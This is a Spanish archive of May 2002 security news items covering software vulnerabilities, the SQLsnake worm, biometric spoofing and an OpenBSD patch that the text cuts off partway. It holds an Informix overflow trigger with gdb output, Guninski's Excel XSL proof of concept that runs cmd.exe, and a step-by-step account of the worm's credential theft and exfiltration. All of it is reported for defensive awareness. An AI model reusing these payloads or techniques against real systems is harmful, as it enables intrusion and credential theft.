viernes, 31 de mayo de 2002

Vulnerabilidad en Informix SE-7.25

Se ha descubierto una nueva vulnerabilidad que afecta a Informix
SE-7.25, potente paquete de gestión de Base de Datos al igual que
de desarrollo.
Recientemente se ha conocido una vulnerabilidad que afecta a Informix
SE-7.25, en el momento de redactar esta noticia solamente se tiene
constancia de su explotación sobre plataforma Linux, pero todo hace
pensar que podría exportarse esta vulnerabilidad a otras plataformas
donde corra Informix SE-7.25.

El problema se produce al definir la variable INFORMIXDIR con un
tamaño superior a 2023 bytes, lo que provoca un desbordamiento
de buffer. Esto puede permitir a un usuario con privilegios sobre
/lib/sqlexec obtener nivel de administrador euid=0, en una
instalación por defecto de Informix SE-7.25.


[pask@dimoni lib]$ ls -FAlsc
total 2588
4 drwxrwxr-x 2 informix informix 4096 May 28 22:50 boom/
1484 -rwsr-sr-x 1 root informix 1515480 Apr 20 22:09 sqlexec*
504 -rwxr-xr-x 1 informix informix 510283 Apr 20 22:09 sqlexecd*
596 -rwxr-xr-x 1 informix informix 606041 Apr 20 22:09 sqlrm*

[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'`
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault

[pask@dimoni lib]$ gdb ./sqlexec
(gdb) r
Starting program: /home/informix/SE-7.25/lib/./sqlexec
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
(gdb) info registers
...
esp 0x3fffed08 0x3fffed08
ebp 0x41414141 0x41414141
esi 0x3fffedf9 1073737209
edi 0x8191571 135861617
eip 0x41414141 0x41414141
...




Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Local Vulnerability in Informix SE-7.25
http://hades2.concha.upv.es/~pask/advisories/2002/Informix%20sqlexec

Informix product family
http://www-3.ibm.com/software/data/informix/



jueves, 30 de mayo de 2002

eEurope 2005 un nuevo marco para seguridad de la información

El pasado día 28 de Mayo, la comisión del consejo europeo encargada de
establecer lo que será el futuro de la comunicaciones europeas envió
una comunicación a los diferentes comités europeos afectados con el
fin de llevar a buen fin lo que ahora es un proyecto y de seguro
será una realidad a corto plazo. Un plazo tan corto y cercano como
el año 2005.
Los puntos fundamentales que afectan directamente al mundo de la
seguridad serían:

CSTF

La fundación y próxima entrada como cuerpo operativo de CSTF,
(Destacamento de Fuerzas de la Seguridad de Ciberespacio). Se contempla
como tiempo máximo para la entrada en acción de este nuevo cuerpo
policial los meses de mediados del año 2003. Un punto que dará mucho
que hablar muy pronto es la declaración del consejo por la que insta
al sector privado a dar un apoyo incondicional al CSTF.

Cultura de la seguridad

Se realizará un esfuerzo extra con el fin de crear una cultura para la
seguridad informática, tanto en administraciones, empresas, usuarios,
etc. Para ello se promoverá la aplicación de buenas prácticas
implantación de estándares más seguros y la promoción entre los
usuarios. Se prevé que este plan este funcionando para finales del
2005.

Interconexión gubernamental

Igualmente se intentará que la administración pública sea un ejemplo
en la implantación de estas políticas de seguridad. Es por lo que se
espera que para finales del 2003 los estados miembros de la Comisión
Europea establezcan un ambiente seguro en las comunicaciones entre sus
miembros.

También se propone apoyar la estandarización con el objeto de un uso
más amplio de estándares abiertos y software open source. Se deberá
considerar el factor humano en la seguridad.



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

eEurope 2005: An information society for all
http://europa.eu.int/information_society/eeurope/news_library/eeurope2005/index_en.htm



miércoles, 29 de mayo de 2002

Desbordamiento de búfer en JRun

Las versiones para Win32 de JRun 3.0 y 3.1 contienen una vulnerabilidad
de desbordamiento de búfer explotable de forma remota que permitirá a un
atacante conseguir el control total del servidor.
Macromedia JRun es un servidor J2EE diseñado para ejecutarse en
servidores web para das soporte aplicaciones basadas en páginas JSP y
Servlets en Java. Cuando se instala JRun se crea una aplicación o filtro
ISAPI en el directorio virtual /scripts. Si llega una petición al
servidor para un recurso .jsp el filtro realiza el tratamiento de la
petición.

Además, si a la DLL ISAPI se accede de forma directa esta actúa como
aplicación. Al realizar una petición a la DLL con el campo de cabecera
Host muy largo se producirá el desbordamiento de búfer. Si el atacante
logra explotarlo adecuadamente el código malicioso se ejecutará con los
permisos del sistema.

Macromedia ha publicado los parches necesarios para corregir el
problema, que pueden descargarse desde las siguientes direcciones:
Para JRun 3.1:
http://download.allaire.com/publicdl/en/jrun/31/jrun-31-win-upgrade-us_26414.exe
Para JRun 3.0:
http://download.allaire.com/publicdl/en/jrun/30/jr30sp2_25232.exe


Antonio Ropero
antonior@hispasec.com


Más información:

Aviso de seguridad de Macromedia
MPSB02-02-Patch Available for ISAPI buffer overflow in JRun 3.0/3.1
http://www.macromedia.com/v1/handlers/index.cfm?ID=22994

Macromedia JRun Buffer Overflow
http://www.ngssoftware.com/advisories/jrun.txt



martes, 28 de mayo de 2002

Libro "Seguridad en Unix y Redes" v2.0

Disponible la última versión del libro "Seguridad en UNIX y Redes",
de Antonio Villalón Huerta, gratuito y descargable en formato PDF.
"Seguridad en Unix y Redes" v2.0 se distribuye en formato PDF de forma
gratuita bajo las condiciones de la Open Publication License. Sus 498
páginas pueden ser descargadas en un fichero comprimido de 2.37 Mbytes
(2.63Mbytes descomprimido), desde la dirección:

http://andercheran.aiind.upv.es/toni/personal/unixsec.pdf

Cambios con respecto a versiones anteriores:

Versión 2.0 (Mayo'02): Capítulos dedicados a los sistemas de detección
de intrusos y a los ataques remotos contra un sistema. Sustitución del
capítulo referente al núcleo de algunos sistemas Unix por varios
capítulos que tratan particularidades de diferentes clones con mayor
detalle. Desglose del capítulo dedicado a los sistemas cortafuegos en
dos, uno teórico y otro con diferentes casos prácticos de estudio.
Ampliación de los capítulos dedicados a autenticación de usuarios
(PAM) y a criptografía (funciones resumen). Ampliación del capítulo
dedicado a políticas y normativa, que ahora pasa a denominarse
'Gestión de la seguridad'.

A continuación se lista el índice de materias:

Notas del Autor
1.Introducción y conceptos previos

Seguridad del entorno de operaciones
2.Seguridad física de los sistemas
3.Administradores, usuarios y personal

Seguridad del sistema
4.El sistema de ficheros
5.Programas seguros, inseguros y nocivos
6.Auditoría del sistema
7.Copias de seguridad
8.Autenticación de usuarios

Algunos sistemas Unix
9.Solaris
10.Linux
11.AIX
12.HP-UX

Seguridad de la subred
13.El sistema de red
14.Algunos servicios y protocolos
15.Cortafuegos: Conceptos teóricos
16.Cortafuegos: Casos de estudio
17.Ataques remotos
18.Sistemas de detección de intrusos
19.Kerberos

Otros aspectos de la seguridad
20.Criptología
21.Algunas herramientas de seguridad
22.Gestión de la seguridad

Apéndices
A.Seguridad básica para administradores
B.Normativa
C.Recursos de interés en INet
D.Glosario de términos anglosajones

Conclusiones
Bibliografía



Bernardo Quintero
bernardo@hispasec.com


Más información:

Descarga "Seguridad en Unix y Redes" v2.0
http://andercheran.aiind.upv.es/toni/personal/unixsec.pdf



lunes, 27 de mayo de 2002

La biometría en entredicho: falsificación de huellas dactilares

Un matemático japonés (no un ingeniero, un programador o un experto
en falsificaciones, sino un matemático) ha conseguido engañar once
lectores de huellas digitales invirtiendo menos de 10 dólares en
material de fácil obtención.
Tsutomu Matsumoto duplicó una huella digital resaltando su impresión
sobre cristal (por ejemplo, un vaso o una ventana) mediante adhesivo de
cianoacrilato (comercialmente distribuido con marcas tan conocidas como
"Super Glue") y fotografiando el resultado mediante una cámara digital.
La imagen resultante se mejoró mediante PhotoShop y se imprimió en una
hoja de papel transparente.

Matsumoto utilizó dicho papel como máscara para generar un circuito
impreso con la imagen de la huella digital (para proporcionar
"relieve"). Dicho circuito impreso, el material para el fijado y
revelado y las instrucciones detalladas del proceso, se pueden conseguir
en cualquier tienda de electrónica por menos de 3 euros.

Seguidamente se obtuvo un dedo de "gelatina" empleando el circuito
impreso para proporcionarle el relieve que emula la huella digital
original.

En total, menos de 10 dólares en gastos y una hora de trabajo. El
resultado: un "dedo" que pasa la prueba de un escáner digital con una
efectividad del 80%.

¿Prohibirá EE.UU. la fabricación y venta de gelatina alimentaria, por
sus posibles usos como herramienta para engañar a los lectores de
huellas digitales?. ¿Cual será el impacto de publicitar estos problemas
en las iniciativas para poder realizar pagos electrónicos con una simple
autentificación biométrica?.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Fun with Fingerprint Readers
http://www.counterpane.com/crypto-gram-0205.html#5

Gummi bears defeat fingerprint sensors
http://www.theregister.co.uk/content/55/25300.html

Biometric Access Protection Devices and their Programs Put to the Test
http://www.heise.de/ct/english/02/11/114/

Technology offers a feeling of security
http://www.usatoday.com/life/cyber/tech/2001/11/14/privacy-usat.htm

Face Recognition Technology Fails Again, ACLU Claims
http://www.technews.com/news/02/176621.html

Face-Scanning Loses by a Nose in Palm Beach
http://slashdot.org/article.pl?sid=02/05/27/0032212

Palm Beach Airport Won't Use Face-Scan Technology
http://www.mycfnow.com/orlpn/news/stories/news-148124920020526-160533.html

Slashback: Counterstrike, Identification, Patenxtortion
http://slashdot.org/article.pl?sid=02/05/16/1415230



domingo, 26 de mayo de 2002

La biometría en entredicho

Tras los acontecimientos del pasado 11 de Septiembre, muchas
organizaciones abogaron por el uso de medidas biométricas para mejorar
la seguridad en aeropuertos y lugares públicos, como estadios o parques
de atracciones. Las pruebas prácticas, sin embargo, muestran que el
valor de la tecnología biométrica actual es puro humo.
La biometría es la tecnología por medio de la cual la aceptación de un
individuo se realiza no mediante una clave que sólo él conoce o por una
llave que sólo él posee, sino por lo que es en sí mismo: huellas
dactilares, análisis facial, análisis de iris, reconocimiento de voz,
etc.

A pesar de presentar la tecnología como una panacea al problema de
claves inseguras o de pérdida o duplicación de elementos físicos de
seguridad, nunca se han señalado los problemas de la tecnología a la
hora de afrontar situaciones atípicas. ¿Qué ocurre, por ejemplo, si

* Un usuario confiable sufre una amputación del dedo, o daños en sus
yemas tras un fin de semana de bricolaje?

* Y si el usuario confiable sufre de ceguera parcial y no puede pasar el
escáner retiniano debido a sus cataratas y, como es de imaginar, no
existen mecanismos de autenticación de respaldo?

* Y si tras una larga noche tenemos ronquera y nuestra voz es
irreconocible?.

* Y si estamos afónicos o tenemos congestión nasal?.

Estas situaciones se pueden considerar atípicas, pero los sistemas
biométricos deben diseñarse para hacerles frente. En todo caso los
fabricantes nos dan la garantía de que en situaciones así lo peor que
puede ocurrir es que se le deniegue el acceso a un usuario legítimo,
pero que en ningún caso un atacante malicioso podrá colarse en el
sistema.

Más lamentable aún, muchas pruebas de campo recientes demuestran que,
incluso ante situaciones muy favorables, resulta trivial, en la mayoría
de los casos, provocar falsos positivos en los sistemas biométricos
evaluados. Es decir, que cualquier atacante puede pasar la verificación
de estos sistemas sin necesidad de poner en acción recursos
significativos.

En ese sentido la fiabilidad biométrica es muy inferior al de una
política de claves bien definida. Peor aún, proporcionan una sensación
de invulnerabilidad que, como se demuestra, es completamente irreal.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Fun with Fingerprint Readers
http://www.counterpane.com/crypto-gram-0205.html#5

Gummi bears defeat fingerprint sensors
http://www.theregister.co.uk/content/55/25300.html

Biometric Access Protection Devices and their Programs Put to the Test
http://www.heise.de/ct/english/02/11/114/

Technology offers a feeling of security
http://www.usatoday.com/life/cyber/tech/2001/11/14/privacy-usat.htm

Face Recognition Technology Fails Again, ACLU Claims
http://www.technews.com/news/02/176621.html

Face-Scanning Loses by a Nose in Palm Beach
http://slashdot.org/article.pl?sid=02/05/27/0032212

Palm Beach Airport Won't Use Face-Scan Technology
http://www.mycfnow.com/orlpn/news/stories/news-148124920020526-160533.html

Slashback: Counterstrike, Identification, Patenxtortion
http://slashdot.org/article.pl?sid=02/05/16/1415230



sábado, 25 de mayo de 2002

Problema de seguridad en Excel XP

El ya conocido Georgi Guninski, habitual de nuestras noticias, ha descubierto una nueva vulnerabilidad acerca de un problema de seguridad que afecta a Excel XP.

Según Guninski, la hoja de cálculo de Microsoft para XP, se ve afectada por un problema debido a la incorporación de nuevas tecnologías como XML y XSLT. Desafortunadamente Excel ofrece un comportamiento incorrecto y se llegará a ejecutar código arbitrario si el usuario abre un archivo .xls y elige visualizarlo con la hoja de estilo xml.

Excel no da ningún aviso al usuario, tan solo pregunta cuando se desea emplear la hoja de estilo xml o no. De esta forma un archivo xls maliciosamente preparado podrá llegar a tomar el control del sistema.

Guninski ofrece la siguiente demostración del problema:

------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
----------------------

Se recomienda no emplear la hoja de estilo xml en caso de que Excel pregunte por dicha acción.


Antonio Ropero
antonior@hispasec.com


Más información:

Georgi Guninski security advisory #55, 2002:
Excel XP xml stylesheet problems:
http://www.guninski.com/ex$el2.html



viernes, 24 de mayo de 2002

Desbordamiento de búfer en IBM DB2

IBM DB2, el sistema de base de datos de IBM, se ve afectado por una
vulnerabilidad de desbordamiento de búfer que podría permitir a un
atcante la obtención de permisos de root o administración.
IBM DB2 incluye la utilidad "db2ckpw" como parte de su sistema de
autenticación. Por defecto esta utilidad se instala con permisos de
root. Se ha descubierto una condición de desbordamiento de búfer en esta
utilidad. Es posible explotar esta condición si se proporciona un nombre
de usuario mayor de ocho caracteres de longitud. Si un atacante logra
explotar esta vulnerabilidad de forma adecuada podrá conseguir acceso de
administración.

IBM ha proporcionado las siguientes actualizaciones para evitar este
problema:

Para IBM DB2 6.0 y 6.1 para AIX:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv61/FP10_U482111/

Para IBM DB2 6.0 y 6.1 para HP-UX10.x:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2hp10v61/FP10_U482113/

Para IBM DB2 6.0 y 6.1 para HP-UX11.x:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2hp11v61/FP10_U482114/

Para IBM DB2 6.0 y 6.1 para Linux:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2linuxv61/FP10_IP22471/

Para IBM DB2 6.0 para Solaris:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2sunv61/FP10_U482112/

Para IBM DB2 7.x para AIX:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv7/FP6_U481406/

Para IBM DB2 7.x para AIX 4.3 64 bits:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aix43-64v7/FP6_U481407/

Para IBM DB2 7.x para AIX 5 64 bits:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aix5-64v7/FP6_U481408/

Para IBM DB2 7.x para Linux:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2linuxv7/FP6_U481413/

Para IBM DB2 7.x para HP-UX 11.x:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2hpv7/FP6_U481411/

Para IBM DB2 7.x para Solaris:
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2sunv7/FP6_U481409/

Para IBM DB2 7.x para Solaris (64 bits):
ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2sun64v7/FP6_U481410/



Antonio Ropero
antonior@hispasec.com


Más información:

Securityfocus:

IBM DB2 db2ckpw Buffer Overflow Vulnerability
http://online.securityfocus.com/bid/4817



jueves, 23 de mayo de 2002

Vulnerabilidad en Ipswitch Imail 7.1 y anteriores

El servidor de correo Imail 7.1 de la compañía Ipswitch se ve
afectado por un problema de desbordamiento de buffer que
puede permitir a un atacante tomar el control del servidor
afectado.
El servidor de correo Ipswitch Imail versión 7.1 y anteriores que
corre sobre Microsoft Windows 2000 y XP, se ve afectado por una
vulnerabilidad que permite a un atacante producir un desbordamiento de
buffer. La ejecución de esta vulnerabilidad permite a un atacante la
ejecución de código de forma remota en el servicio de Imail con
los permisos del sistema.

El problema reside exactamente en uno de los componentes de Imail,
concretamente en el servicio LDAP. Este es el encargado de permitir
a un cliente remoto el acceso a Ipswitch Imail. Si un atacante
introdujera una larga cadena de caracteres como parámetro de
"bind DN", podría conseguir un desbordamiento de buffer con la
consiguiente caída del servicio y la ejecución de código en el
sistema atacado.



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Buffer Overflow in Ipswitch Imail 7.1 and Prior
http://www.net-security.org/vuln.php?id=1695

Patches & Upgrades Ipswitch
http://www.ipswitch.com/Support/IMail/patch-upgrades.html



miércoles, 22 de mayo de 2002

SQLsnake: viejas vulnerabilidades, nuevo gusano

SQLsnake es un gusano que ataca los servidores Microsoft SQL
Server configurados de forma deficiente. El objetivo: obtener una
relación de los usuarios del sistema y sus contraseñas, así como
datos sobre la red y la configuración de las bases de datos.
El gusano se aprovecha de la existencia de una configuración
deficiente en muchas instalaciones de Microsoft SQL Server, donde
la cuenta de usuario "sa" no tiene asignada ninguna contraseña y
de algunos procedimientos extendidos que ofrece el servidor de
base de datos.

Los procedimientos extendidos son una característica de SQL
Server que permite acceder, desde las consultas SQL, a funciones
externas al gestor de base de datos. El producto incluye una gran
cantidad de procedimientos extendidos y es posible añadir nuevos
procedimientos personalizados.

Descripción del gusano

El gusano, que según los diferentes servicios de medición y
seguimiento de incidencias está generando una gran actividad,
intenta localizar servidores Microsoft SQL. Para ello realiza
peticiones de conexión contra el puerto 1433/tcp.

Cuando localiza un sistema con este puerto abierto, el gusano
intenta ejecutar un script de inicialización mediante el
procedimiento extendido xp_cmdshell y utilizando el usuario de
administración "sa", sin ninguna contraseña.

En caso de que sea posible la ejecución del script, el gusano
entra y en acción y realiza las siguientes funciones:

* Activa la cuenta de usuario invitado de Windows

* Se otorgan privilegios de administración a esta cuenta
(inclusión dentro de "Administrators" y "Domain Admins").

* Copia los siguientes archivos:
o system32\drivers\services.exe
o system32\sqlexec.js
o system32\clemail.exe
o system32\sqlprocess.js
o system32\sqlinstall.bat
o system32\sqldir.js
o system32\run.js
o system32\timer.dll
o system32\samdump.dll
o system32\pwdump2.exe

* Oculta estos nuevos archivos, activando el atributo "hidden".

* Desactiva la cuenta de usuario invitado de Windows.

* Elimina esta cuenta de los grupos de administración.

* Modifica la contraseña del usuario "sa" por una secuencia de
cuatro pares de letras y números aleatorios.

* Ejecuta "netdde".

* Conecta a SQL Server como "sa", utilizando la nueva contraseña.

* Copia el editor de registro (regedt32.exe) a %SystemRoot%.

* Ejecuta "ipconfig /all" y registra la salida en "send.txt"

* Añade a "send.txt" una relación de las tables de bases de datos
existentes en el sistema.

* Ejecuta pwdump2.exe para extraer las contraseñas del sistema y
las añade a "send.txt".

* Envía el archivo "send.txt" a la dirección ixltd@postone.com
(utiliza como tema "SystemData-[PW]", donde [PW] es la nueva
contraseña asignada al usuario "sa".

Una vez realizadas estas tareas, el gusano empieza la función de
localización de nuevos sistemas vulnerables:

* Utiliza el programa services.exe para localizar nuevos
servidores vulnerables. Lanza 100 threads simultáneos,
registrando los resultados en el archivo "rdata.txt", dentro de
system32.

* Extrae del archivo "rdata.txt" las direcciones IP que tienen el
puerto 1433 abierto.

* Envía el código del gusano a todas estas direcciones IP.

* Realiza una pausa de un minuto.

* Borra el archivo "rdata.txt" y los archivos donde registra el
resultado de la ejecución del gusano.

El gusano también establece una serie de claves del registro para
asegurar su ejecución cada vez que se inicia Windows:

* HKLM\System\CurrentControlSet\Services\NetDDE\ImagePath
"%COMSPEC% /c Stara netdde && sqlprocess INIT",

* HKLM\System\CurrentControlSet\Services\NetDDE\Start
"2"

También se establece otra clave del registro para asegurar la
conectividad SQL:

* HKLM\software\Microsoft\mssqlserver\client\connectto\dsquery
"dbmssocn"

Desinfección

Si el gusano ha conseguido entrar en un sistema, los pasos a
seguir son:

1. Borrar los archivos listados anteriormente como parte del gusano.
2. Cambiar la contraseña del usuario "sa".
3. Cambiar las contraseñas de los usuarios del sistema.

Otros productos vulnerables

SQL Server forma parte de otros productos de Microsoft que pueden
ser igualmente infectados por el gusano:

* Microsoft Access 2000 (no se instala por defecto, pero es
posible instalarlo de forma opcional. En caso de instalación, el
usuario "sa" no tiene asignada ninguna contraseña).
* Microsoft Visio Enterprise Network Tools
* Microsoft Project Central
* Microsoft Visual Studio 6



Xavier Caballé
xavi@hispasec.com


Más información:

SQLsnake code análisis

http://www.incidents.org/diary/diary.php?id=157

MSSQL Worm (SQLsnake) on the rise
http://www.incidents.org/diary/diary.php?id=156

Microsoft SQL Spida Worm Propagation
http://www.iss.net/security_center/alerts/advise118.php

Una al día (21-05-02): Nuevo gusano SQLsnake ataca servidores SQL Server
http://www.hispasec.com/unaaldia.asp?id=1304

Avís: SQLsnake, un cuc que ataca a SQL Server
http://www.quands.info/alertes/html/sqlsnake.html

SQLSecurity
http://www.sqlsecurity.com/



martes, 21 de mayo de 2002

Nuevo gusano SQLsnake ataca servidores SQL server

En las últimas horas se está registrando una elevada actividad de
escaneo del puerto 1433, habitualmente asociado a Microsoft SQL
Server. El informe inicial publicado por incidents.org revela que
se trata de un nuevo gusano.
El puerto 1433/tcp es utilizado en la configuración por defecto
por Microsoft SQL Server. Cuando se instala este gestor de base
de datos, se crea una cuenta por omisión (SA), con privilegios de
administración y sin contraseña. Muchos administradores de SQL
Server cometen el error de dejarla activa y no le asignan ninguna
contraseña. Mediante la utilización de esta cuenta, se pueden
ejecutar órdenes arbitrarias de SQL para, por ejemplo, leer o
escribir bases de datos.

Este nuevo gusano descubierto, que actúa de forma automática,
aprovecha estas cuentas de administración sin contraseña. Entre
otras cosas, envía por correo electrónico una relación de las
contraseñas del sistema a una dirección de correo electrónico
(que, a primeras horas de esta tarde, devolvía un mensaje de
error por sobrepasar la cuota máxima permitida).

Tal como recoge incidents.org, el gusano en estos momentos
representa una importante actividad, tal como puede comprobarse
en el gráfico

http://isc.incidents.org/port_details.html?port=1433&tarax=1

(la línea roja indica el número de sistemas que realizan
actividades de escaneo contra este puerto).

Protección básica

1) Bloquear, en los sistemas de protección perimetral, el acceso
al puerto 1433/tcp.

2) Verificar que todos los servidores SQL Server disponen de los
diferentes parches publicados y que se ha establecido una
contraseña para la cuenta SA

3) Utilizar, siempre que sea posible, syskey para una mayor
seguridad en las contraseñas del sistema operativo

4) Bloquear la dirección de correo ixltd@postone.com (la
dirección donde se envían las relaciones de contraseñas).

Debe tenerse presente que algunos productos, como Visio
Enterprise Edition o Access 2000 (en este último caso, se instala
opcionalmente), instalan una versión de SQL Server. Estos
sistemas son, por tanto vulnerables a la actividad del gusano.
Para reconocer posibles sistemas dentro de nuestras redes, puede
realizarse un escaneo de puertos para comprobar que sistemas
tienen el puerto 1433/tcp activo.



Xavier Caballé
xavi@hispasec.com



lunes, 20 de mayo de 2002

¿Gastan los profesionales de seguridad mucho tiempo buscando información?

Se han publicado los resultados de una interesante encuesta en la que se
pretende responder a la pregunta "¿Cuánto tiempo gastan los
profesionales de la seguridad informática buscando información?".
En la actualidad una de las principales quejas de los profesionales de
la seguridad informática es que no disponen de suficiente tiempo para
mantenerse informados sobre las novedades y los riesgos, cada vez
mayores, que afectan a sus organizaciones.

La investigación se llevó a cabo entre 266 profesionales de la
seguridad, incluyendo consultores, analistas y administradores de
sistemas con dos preguntas básicas "¿Cuántas horas al día gasta buscando
información sobre seguridad?" y "¿Piensa que pierde mucho tiempo
buscando dicha información?".

Los resultados de la encuesta muestran que el personal de seguridad
pierde una media de 2,1 horas al día buscando información sobre
seguridad, es decir más de un cuarto de día. Teniendo en cuenta los
sueldos medios anuales para los especialistas en seguridad informática,
se estima que del sueldo medio anual de un profesional de la seguridad
24.500 euros se gastan en la búsqueda de información.

Esto contrasta con el valor que dan los profesionales de la seguridad a
la información, ya que un 57% de los encuestados estiman que no pierden
mucho tiempo buscando información. Incluso teniendo en cuenta que un 42%
de ellos gastan más de 2 horas al día e incluso un 18% dedican más de 6
horas al día.

Para ayudar a los profesionales de la seguridad en la ardua labor de
búsqueda de información y reducir el tiempo que se dedica a ello para
así incrementar su productividad, Hispasec Sistemas ofrece el "Servicio
de Análisis, Notificación y Alertas" (SANA) gracias los responsables de
seguridad recibirán la información que desean de forma personalizada y
puntual.



Antonio Ropero
antonior@hispasec.com


Más información:

SANA:
http://www.hispasec.com/sana/

Survey: Are Security Professionals Wasting their Time?
http://www.securityfocus.com/corporate/research/timesurvey.shtml



domingo, 19 de mayo de 2002

12 agujeros en Internet Explorer de Microsoft

El último parche distribuido por Microsoft para Internet Explorer, que
cubre 6 nuevas vulnerabilidades, está incompleto ya que no resuelve en
su totalidad uno de los problemas. Así al menos lo afirma un informe
de GreyMagic Software, compañía israelí que detectó el agujero de la
discordia. No se trata de algo aislado, actualmente hay un listado
público de 12 vulnerabilidades no corregidas por Microsoft en su
navegador.
"Microsoft no entendió el problema. Sólo corrigió un síntoma de la
vulnerabilidad, no la causa principal". GreyMagic no se queda sólo
en palabras, ha publicado un aviso de seguridad con demostración
incluida donde se puede comprobar cómo, después de instalar el último
parche de Microsoft, aun se pueden leer archivos locales en Internet
Explorer 5.01 y 5.5 aprovechando la propiedad cssText del objeto hoja
de estilo.

El cúmulo de despropósitos no termina aquí. Thor Larholm, quién
mantiene un sitio donde denuncia vulnerabilidades de Internet Explorer
no corregidas por Microsoft, ha actualizado su listado después de
instalar el último parche. Los resultados son concluyentes, partiendo
de 14 vulnerabilidades públicas no corregidas, y tras instalar el
parche acumulativo del 15 de mayo, a día de hoy Internet Explorer
mantiene 12 agujeros de seguridad.



Bernardo Quintero
bernardo@hispasec.com


Más información:

Importante actualización para Internet Explorer
http://www.hispasec.com/unaaldia.asp?id=1299

GreyMagic Security Advisory GM#004-IE
http://sec.greymagic.com/adv/gm004-ie/

Listado de vulnerabilidades no corregidas
http://jscript.dk/unpatched/

Microsoft Patch for IE Flaws Is 'Incomplete'
http://www.eweek.com/article/0,3658,s=712&a=27048,00.asp

Microsoft rapped over 'incomplete' patch
http://www.vnunet.com/News/1131845

MS IE patch misses the mark
http://www.theregister.co.uk/content/55/25326.html

La trastienda del "full disclosure"
http://www.hispasec.com/unaaldia.asp?id=1257



sábado, 18 de mayo de 2002

Vulnerabilidad en la serie 11000 de Cisco Content Service Switch

La serie 11000 de switches Cisco CSS (Cisco Content Service) se ve
afectada por un problema de denegación de servicio debido a una mala
interpretación de datos "XML".
Los Cisco Content Service Switch (CSS) serie 11000 que comprenden las
plataformas de hardware CSS 11050, CSS 11150 y CSS 11800 son una
solución de conmutación para sitios Web. Los Arrowpoint, como también
son conocidos, incorporan el software de Cisco (Web NS), Web Network
Services, aplicación web que facilita su administración. Esto permite
a los proveedores de contenidos y grandes empresas de comercio
electrónico construir redes globales optimizadas para transacciones
electrónicas y entregas de contenidos.

Es de esta aplicación web de donde provienen los problemas que afectan
a estos dispositivos. El fallo reside en una mala interpretación de algunos
tipos de peticiones "HTTP POST" que producirán una denegación de
servicios.

Generalmente los Content Service Switch, utilizan para la gestión de
Web Network Services el puerto 8081, por lo que un atacante que
realice peticiones de datos "XML" (Extensible Markup Language),
provocará la denegación de servicios y el reinicio de la máquina.

Cisco recomienda como solución temporal el deshabilitar la gestión
mediante interfaz web, restringir el web-mgmt y los datos xml.

Son vulnerables la versiones de WebNS de la serie CSS 11000:
04.01.053s y anteriores
05.00.038s y anteriores
05.01.012s y anteriores
05.02.005s y anteriores

Los usuarios de Cisco y podrán conocer la versión mediante el
comando "versión" en la línea de comandos del CSS.



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Content Service Switch Web Management HTTP Processing Vulnerabilities


http://www.cisco.com/warp/public/707/css-http-post-pub.shtml



viernes, 17 de mayo de 2002

Problema de seguridad en OpenBSD

Las versiones actuales de OpenBSD permiten que cualquier usuario
local del sistema bloquee la máquina y, bajo ciertas condiciones,
obtenga privilegios de administrador o "root".
El problema radica en la verificación de los descriptores de
ficheros 0, 1 y 2 (entrada, salida y error estándar, respectivamente)
cuando se intenta ejecutar un proceso SETUID o SETGID.

Debido a la forma en la que se hace dicha verificación, un usuario
local del sistema puede llenar la tabla de descriptores del
sistema, creando un ataque DoS (denegación de servicio) y, bajo
ciertas circunstancias, lograr privilegios de administrador o "root".

Las versiones en desarrollo de OpenBSD ya están "parcheadas".

Gracias a las ventajas del código abierto, los usuarios pueden
parchear sus propios sistemas sin necesidad de esperar una nueva
versión del sistema operativo. Con este parche, el kernel abortará
la ejecución de la función "exec()" sobre un ejecutable
SETUID/SETGID si se detecta algún tipo de problema:



Aplicar el parche con:
cd /usr/src
patch -p0 < 003_fdalloc2.patch

y luego recompilar el kernel.


Index: sys/kern/kern_exec.c
===================================================================
RCS file: /cvs/src/sys/kern/kern_exec.c,v
retrieving revision 1.66
diff -u -r1.66 kern_exec.c
--- sys/kern/kern_exec.c 14 Mar 2002 17:17:23 -0000 1.66
+++ sys/kern/kern_exec.c 8 May 2002 20:18:41 -0000
@@ -534,9 +534,6 @@
* allocated. We do not want userland to accidentally
* allocate descriptors in this range which has implied
* meaning to libc.
- *
- * XXX - Shouldn't the exec fail if we can't allocate
- * resources here?
*/
if (fp == NULL) {
short flags = FREAD [ (i == 0 ? 0 : FWRITE);
@@ -544,7 +541,7 @@
int indx;

if ((error = falloc(p, &fp, &indx)) != 0)
- break;
+ goto exec_abort;
#ifdef DIAGNOSTIC
if (indx != i)
panic("sys_execve: falloc indx != i");
@@ -552,13 +549,13 @@
if ((error = cdevvp(getnulldev(), &vp)) != 0) {
fdremove(p->p_fd, indx);
closef(fp, p);
- break;
+ goto exec_abort;
}
if ((error = VOP_OPEN(vp, flags, p->p_ucred, p)) != 0) {
fdremove(p->p_fd, indx);
closef(fp, p);
vrele(vp);
- break;
